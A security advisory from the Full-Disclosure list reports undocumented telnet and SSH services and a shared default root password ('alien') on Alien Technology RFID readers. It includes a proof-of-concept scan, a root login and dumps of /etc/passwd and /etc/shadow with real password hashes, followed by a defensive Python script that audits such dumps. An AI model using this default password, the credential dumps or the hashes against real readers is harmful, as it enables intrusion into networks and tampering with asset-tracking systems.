-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Tested: www.alientechnology.com/readers/alr9900.php

Background:

Alien Technology is a major RFID reader designer and manufacturer. Alien's products are sold to many corporations and to the military. Alien's readers can be interfaced with in several ways, including serial, I/O port and Ethernet. Alien has several daemons running on the reader that are reachable over Ethernet and are completely undocumented. We called Alien several times to ask them about these undocumented services and were first deferred to technical support and then had our numbers blocked. We then emailed them about the security ramifications of these daemons and received no reply.

The Undocumented:

port 2323 - telnetd
port 23   - telnetd
port 22   - sshd

The Flaws:

default root password = 'alien'
the alien account has the same password across all readers
port 2323 - provides a backdoor onto the readers for anyone who knows the alien (or root) account password
port 23   - same
port 22   - same

The P.O.C:

Starting Nmap 5.21 ( http://nmap.org ) at 20XX-XX-XX XX:XX Pacific Daylight Time
Nmap scan report for XXX.XXX.XXX.XXX
Host is up (0.000092s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
23/tcp   open  telnet
80/tcp   open  http
111/tcp  open  rpcbind
2323/tcp open  unknown
MAC Address: XX:XX:XX:XX:XX:XX (Alien Technology)

Nmap done: 1 IP address (1 host up) scanned in 0.66 seconds

login as: root
Using keyboard-interactive authentication.
Password: <- root
Access denied
Using keyboard-interactive authentication.
Password: <- password
Access denied
Using keyboard-interactive authentication.
Password: <- alien
Last login: Sun Jan 11 03:04:54 1970 from XXX.XXX.XXX.XXX
root@alien-XXXXXX alien# id
uid=0(root) gid=0(root) groups=0(root)
root@alien-XXXXXX alien# cat /etc/passwd
root:$1$lKC6KEQ/$TY22pTtIBwjLxWd2EvM.d0:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/bin/sh
bin:*:2:2:bin:/bin:/bin/sh
sys:*:3:3:sys:/dev:/bin/sh
sync:*:4:65534:sync:/bin:/bin/sync
man:*:6:12:man:/var/cache/man:/bin/sh
lp:*:7:7:lp:/var/spool/lpd:/bin/sh
mail:*:8:8:mail:/var/mail:/bin/sh
news:*:9:9:news:/var/spool/news:/bin/sh
uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:*:13:13:proxy:/bin:/bin/sh
www-data:*:33:33:www-data:/var/www:/bin/sh
backup:*:34:34:backup:/var/backups:/bin/sh
list:*:38:38:Mailing List Manager:/var/list:/bin/sh
irc:*:39:39:ircd:/var/run/ircd:/bin/sh
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:*:65534:65534:nobody:/nonexistent:/bin/sh
sshd:x:100:65534::/var/run/sshd:/bin/false
ntpd:x:102:102::/var/run/openntpd:/bin/false
alien:$1$kcyCMoEZ$kiwa.OVk5PuG4pBwbYEP//:1000:1000:The Alien,18220,,:/home/alien:/bin/bash
root@alien-XXXXXX alien# cat /etc/shadow
ntpd:!:13602:0:99999:7:::
sshd:!:13602:0:99999:7:::
alien:$1$kcyCMoEZ$kiwa.OVk5PuG4pBwbYEP//:13602:0:99999:7:::

Impact:

Alien's readers are deployed in many secure facilities, typically on closed networks. Even on a closed network, these undocumented services let employees modify reader settings and subvert checkout systems. These checkout systems are often used to track valuable items, which makes such vulnerabilities a serious matter. If the readers are deployed on an open or large network, they provide an easy way to tunnel into the network or to attack it from an unexpected location. Lastly, anyone who cracks the alien account's password hash gets to use Alien's backdoor.
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQMCAAYFAkvgptYACgkQPn8o33YUciG/QQQAkB6HDocLM3zd90K5lSN00sGZyaUc
0e5sraILohD4kk2rkSi/dfvZsrPq30nkMrGqrrgqH5sJTtQ6T24UWvfYUH32H8fGGPzN
Ay8w6R+x61IU/4TZYSCq6xZbdI9yhjfOiTi0vwV3xjuwdKul8Zc6c0e0ih8pULG4dAM8
ZXExxzM=
=Bb1k
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
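The /etc/passwd and /etc/shadow dumps in the advisory show more than the default root password: the root and alien hashes sit in world-readable /etc/passwd (root has no shadow entry at all), both are MD5-crypt ($1$), and the claim that the alien account is identical on every reader can be checked offline, because a cloned image carries the same salt and digest on every unit. The script below is an added example, not Alien's code or part of the original post: it audits a small "fleet" of dumps for exactly those properties. Reader A's lines are taken from the advisory (trimmed to the accounts that matter); reader B and its root hash are constructed placeholders standing in for a second unit flashed from the same image.

```python
"""Offline credential audit over passwd/shadow dumps from several embedded
readers.  Added example, not vendor code.  Reader A's data comes from the
advisory above; reader B is constructed (its root hash is a placeholder)."""

from collections import defaultdict

# Reader A: lines from the advisory, trimmed to the relevant accounts.
READER_A_PASSWD = """\
root:$1$lKC6KEQ/$TY22pTtIBwjLxWd2EvM.d0:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/bin/sh
nobody:*:65534:65534:nobody:/nonexistent:/bin/sh
sshd:x:100:65534::/var/run/sshd:/bin/false
ntpd:x:102:102::/var/run/openntpd:/bin/false
alien:$1$kcyCMoEZ$kiwa.OVk5PuG4pBwbYEP//:1000:1000:The Alien,18220,,:/home/alien:/bin/bash
"""
READER_A_SHADOW = """\
ntpd:!:13602:0:99999:7:::
sshd:!:13602:0:99999:7:::
alien:$1$kcyCMoEZ$kiwa.OVk5PuG4pBwbYEP//:13602:0:99999:7:::
"""

# Reader B (constructed): root was re-hashed with a different, placeholder
# salt and digest; the vendor 'alien' account still carries the same string.
READER_B_PASSWD = READER_A_PASSWD.replace(
    "$1$lKC6KEQ/$TY22pTtIBwjLxWd2EvM.d0", "$1$c0nstrct$" + "0" * 22)
READER_B_SHADOW = READER_A_SHADOW

FLEET = {"reader-A": (READER_A_PASSWD, READER_A_SHADOW),
         "reader-B": (READER_B_PASSWD, READER_B_SHADOW)}


def parse_passwd(text):
    """Return {user: (uid, password_field, shell)} from passwd(5) lines."""
    users = {}
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) != 7:          # skip blanks and malformed lines
            continue
        name, pw, uid, _gid, _gecos, _home, shell = fields
        users[name] = (int(uid), pw, shell)
    return users


def parse_shadow(text):
    """Return {user: hash_field} from shadow(5) lines."""
    hashes = {}
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) >= 2:
            hashes[fields[0]] = fields[1]
    return hashes


def is_real_hash(field):
    """True when the field holds a hash rather than the x / * / ! markers."""
    return field not in ("", "x", "*") and not field.startswith("!")


def effective_hashes(passwd_text, shadow_text):
    """user -> hash considered in force: a hash left in the passwd field,
    otherwise the shadow entry.  Locked or absent entries are dropped."""
    shadow = parse_shadow(shadow_text)
    out = {}
    for user, (_uid, pw, _shell) in parse_passwd(passwd_text).items():
        h = pw if is_real_hash(pw) else shadow.get(user, "")
        if is_real_hash(h):
            out[user] = h
    return out


def audit_reader(reader, passwd_text, shadow_text):
    """Per-device findings as (reader, user, finding) tuples."""
    findings = []
    hashes = effective_hashes(passwd_text, shadow_text)
    for user, (uid, pw, _shell) in parse_passwd(passwd_text).items():
        if uid == 0 and user != "root":
            findings.append((reader, user, "additional UID-0 account"))
        if is_real_hash(pw):
            findings.append((reader, user, "hash stored in world-readable /etc/passwd"))
        if hashes.get(user, "").startswith("$1$"):
            findings.append((reader, user, "MD5-crypt hash (cheap to brute-force)"))
    return findings


def shared_hashes(fleet):
    """(user, hash) -> sorted readers for hash strings seen on more than one
    device.  Same salt and digest means the same password was baked into the
    image; a shared password under a different salt is NOT caught here."""
    seen = defaultdict(set)
    for reader, (p, s) in fleet.items():
        for user, h in effective_hashes(p, s).items():
            seen[(user, h)].add(reader)
    return {k: sorted(v) for k, v in seen.items() if len(v) > 1}


def run_audit(fleet=FLEET):
    """Whole-fleet report: per-device findings plus cross-device shared hashes."""
    per_device = [f for r, (p, s) in fleet.items() for f in audit_reader(r, p, s)]
    return {"per_device": per_device, "shared": shared_hashes(fleet)}


if __name__ == "__main__":
    report = run_audit()
    for reader, user, finding in report["per_device"]:
        print(f"{reader}: {user}: {finding}")
    for (user, h), readers in report["shared"].items():
        print(f"shared {user} hash {h} on {', '.join(readers)}")
```

On the advisory's dump the script flags root and alien twice each (hash exposed in /etc/passwd, MD5-crypt) and reports the alien hash as shared between the two units; the constructed root hash on reader B is deliberately not matched, which is the check's blind spot: a vendor that re-salts the same default password per unit defeats string comparison, and only an actual crack or login attempt would reveal it.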